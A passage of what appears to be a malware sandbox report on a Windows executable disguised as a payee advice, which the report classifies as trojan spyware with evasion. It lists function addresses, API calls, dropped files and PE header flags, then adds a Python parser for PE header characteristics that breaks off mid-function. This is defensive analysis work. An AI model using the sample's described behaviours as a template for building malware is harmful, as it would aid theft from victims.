Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBF5E8 2_2_36CBF5E8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB1FED 2_2_36CB1FED
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBF5E1 2_2_36CBF5E1
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB3FE5 2_2_36CB3FE5
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB1FF8 2_2_36CB1FF8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB0DF0 2_2_36CB0DF0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB87F0 2_2_36CB87F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBDDF7 2_2_36CBDDF7
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBE78B 2_2_36CBE78B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB4D89 2_2_36CB4D89
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB9180 2_2_36CB9180
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB4D98 2_2_36CB4D98
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB7998 2_2_36CB7998
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB2D9F 2_2_36CB2D9F
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB1B9D 2_2_36CB1B9D
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB7993 2_2_36CB7993
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBE790 2_2_36CBE790
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBCFA8 2_2_36CBCFA8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB2DA8 2_2_36CB2DA8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB1BA0 2_2_36CB1BA0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBCFA7 2_2_36CBCFA7
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBB7B7 2_2_36CBB7B7
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBC14B 2_2_36CBC14B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB5B48 2_2_36CB5B48
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB5B43 2_2_36CB5B43
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB6B40 2_2_36CB6B40
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB3B58 2_2_36CB3B58
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB095D 2_2_36CB095D
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBC150 2_2_36CBC150
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBA968 2_2_36CBA968
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBA963 2_2_36CBA963
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB0960 2_2_36CB0960
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB9177 2_2_36CB9177
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB170B 2_2_36CB170B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB9B0B 2_2_36CB9B0B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB4908 2_2_36CB4908
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB4903 2_2_36CB4903
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBF119 2_2_36CBF119
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB2918 2_2_36CB2918
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB2913 2_2_36CB2913
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB1710 2_2_36CB1710
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB9B10 2_2_36CB9B10
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB8328 2_2_36CB8328
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB8323 2_2_36CB8323
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBF120 2_2_36CBF120
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB6B3B 2_2_36CB6B3B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBD938 2_2_36CBD938
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBD933 2_2_36CBD933
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE70C0 2_2_36CE70C0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CED710 2_2_36CED710
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE3EC0 2_2_36CE3EC0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE0CC0 2_2_36CE0CC0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE5AE0 2_2_36CE5AE0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE28E0 2_2_36CE28E0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE3880 2_2_36CE3880
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE0680 2_2_36CE0680
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE6A80 2_2_36CE6A80
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE54A0 2_2_36CE54A0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE22A0 2_2_36CE22A0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CEEE48 2_2_36CEEE48
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE3240 2_2_36CE3240
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE0040 2_2_36CE0040
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE6440 2_2_36CE6440
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE4E60 2_2_36CE4E60
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE1C60 2_2_36CE1C60
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE6A70 2_2_36CE6A70
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE5E00 2_2_36CE5E00
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE2C00 2_2_36CE2C00
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE4820 2_2_36CE4820
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE1620 2_2_36CE1620
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE003B 2_2_36CE003B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE99C8 2_2_36CE99C8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE57C0 2_2_36CE57C0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE25C0 2_2_36CE25C0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE0FD9 2_2_36CE0FD9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE41E0 2_2_36CE41E0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE0FE0 2_2_36CE0FE0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE5180 2_2_36CE5180
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE1F80 2_2_36CE1F80
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE6DA0 2_2_36CE6DA0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE3BA0 2_2_36CE3BA0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE09A0 2_2_36CE09A0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE4B40 2_2_36CE4B40
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE1940 2_2_36CE1940
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE6750 2_2_36CE6750
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE6760 2_2_36CE6760
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE3560 2_2_36CE3560
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE0360 2_2_36CE0360
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE4500 2_2_36CE4500
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE1300 2_2_36CE1300
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CED700 2_2_36CED700
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE3240 2_2_36CE3240
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE6120 2_2_36CE6120
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE2F20 2_2_36CE2F20
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1CF0 2_2_36CF1CF0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF8470 2_2_36CF8470
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFFB30 2_2_36CFFB30
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFD8D0 2_2_36CFD8D0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFA6D0 2_2_36CFA6D0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1CE0 2_2_36CF1CE0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF04F9 2_2_36CF04F9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFF4F0 2_2_36CFF4F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF90F0 2_2_36CF90F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFC2F0 2_2_36CFC2F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF0E98 2_2_36CF0E98
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF0E93 2_2_36CF0E93
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFA090 2_2_36CFA090
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFD290 2_2_36CFD290
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFBCB0 2_2_36CFBCB0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF8AB0 2_2_36CF8AB0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFEEB0 2_2_36CFEEB0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF0040 2_2_36CF0040
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF9A50 2_2_36CF9A50
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFCC50 2_2_36CFCC50
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFE861 2_2_36CFE861
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFE870 2_2_36CFE870
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFB670 2_2_36CFB670
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF9410 2_2_36CF9410
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFF810 2_2_36CFF810
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFC610 2_2_36CFC610
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1828 2_2_36CF1828
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF0028 2_2_36CF0028
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1821 2_2_36CF1821
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFB030 2_2_36CFB030
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFE230 2_2_36CFE230
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF09CD 2_2_36CF09CD
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFF1D0 2_2_36CFF1D0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF09D0 2_2_36CF09D0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF8DD0 2_2_36CF8DD0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFBFD0 2_2_36CFBFD0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF35E9 2_2_36CF35E9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFDBF0 2_2_36CFDBF0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFA9F0 2_2_36CFA9F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFB990 2_2_36CFB990
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF8790 2_2_36CF8790
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFEB90 2_2_36CFEB90
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFA3B0 2_2_36CFA3B0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFD5B0 2_2_36CFD5B0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1359 2_2_36CF1359
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFE550 2_2_36CFE550
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFB350 2_2_36CFB350
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1360 2_2_36CF1360
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF9D70 2_2_36CF9D70
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFCF70 2_2_36CFCF70
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF0508 2_2_36CF0508
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFAD10 2_2_36CFAD10
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFDF10 2_2_36CFDF10
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF9730 2_2_36CF9730
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFC930 2_2_36CFC930
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D336F0 2_2_36D336F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D31470 2_2_36D31470
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D33008 2_2_36D33008
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D31B50 2_2_36D31B50
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D347BA 2_2_36D347BA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D32238 2_2_36D32238
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D30D88 2_2_36D30D88
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D32920 2_2_36D32920
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D336E1 2_2_36D336E1
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D3145F 2_2_36D3145F
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D33003 2_2_36D33003
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D31B41 2_2_36D31B41
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D32227 2_2_36D32227
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D30040 2_2_36D30040
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D30011 2_2_36D30011
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D30D79 2_2_36D30D79
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D30A10 2_2_36D30A10
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D309E1 2_2_36D309E1
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D32911 2_2_36D32911
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_373A5C13 2_2_373A5C13
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_373AB8D1 2_2_373AB8D1
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_373A1B4C 2_2_373A1B4C
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: String function: 00402C41 appears 49 times
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201080538.0000000033827000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PayeeAdvice_HK54912_R0038704_37504.exe
Source: PayeeAdvice_HK54912_R0038704_37504.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/5@6/5
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0040336C EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW, 0_2_004046FF
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk, 0_2_00402104
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Mutant created: NULL
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File created: C:\Users\user\AppData\Local\Temp\nsd378D.tmp Jump to behavior
Source: PayeeAdvice_HK54912_R0038704_37504.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
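The two "Static PE information" lines above (file characteristics RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, and the .text section flags) are raw bit fields from the COFF header and section table. The security-relevant reading is that an image with RELOCS_STRIPPED cannot be rebased, so it is always mapped at its preferred ImageBase; that is why the analysis can quote absolute function addresses such as 0_2_0040336C for the entry point. The following parser is an added example written for this page, not Joe Sandbox code and not code from the sample. It decodes both flag sets from a PE header, reports whether the image is rebasable, and is exercised against a constructed minimal PE32 header whose values (ImageBase 0x400000, entry RVA 0x336C, characteristics 0x010F, .text flags 0x60000020) are chosen to reproduce the report's lines; the header bytes are synthetic, not taken from the sample.

```python
import struct

# IMAGE_FILE_HEADER.Characteristics bits (PE/COFF specification).
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}

# IMAGE_SECTION_HEADER.Characteristics bits.
SECTION_CHARACTERISTICS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}

IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040


def decode_flags(value, table):
    """Return the names of all bits of `table` that are set in `value`, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_headers(data):
    """Parse the COFF file header, the optional-header fields that matter for
    rebasing, and the section table of a PE image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (machine, nsections, _stamp, _symptr, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:                       # PE32: 32-bit ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:                                    # PE32+: 64-bit ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 0x46)[0]  # same offset in PE32 and PE32+

    sections = []
    for i in range(nsections):
        (name, _vsize, _va, _rawsize, _rawptr, _relptr, _lnptr,
         _nrel, _nln, sec_chars) = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         decode_flags(sec_chars, SECTION_CHARACTERISTICS)))

    # The loader can only move an image away from ImageBase if it carries relocations
    # and asks for it (DYNAMIC_BASE). With RELOCS_STRIPPED the image always lands at
    # ImageBase, so static addresses such as 0040336C are also the runtime addresses.
    rebasable = bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) \
        and not (characteristics & IMAGE_FILE_RELOCS_STRIPPED)
    return {
        "machine": machine,
        "characteristics": decode_flags(characteristics, FILE_CHARACTERISTICS),
        "image_base": image_base,
        "entry_point_va": image_base + entry_rva,
        "rebasable": rebasable,
        "sections": sections,
    }


def build_sample_pe(characteristics=0x010F, dll_characteristics=0x0000):
    """Constructed minimal PE32 header (synthetic, not the analysed sample): one
    .text section, ImageBase 0x400000 and entry RVA 0x336C so the entry point
    lands at 0x0040336C like the EntryPoint function in the report."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0xE0, characteristics)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 16, 0x336C)                  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x00400000)              # ImageBase
    struct.pack_into("<H", opt, 0x46, dll_characteristics)   # DllCharacteristics
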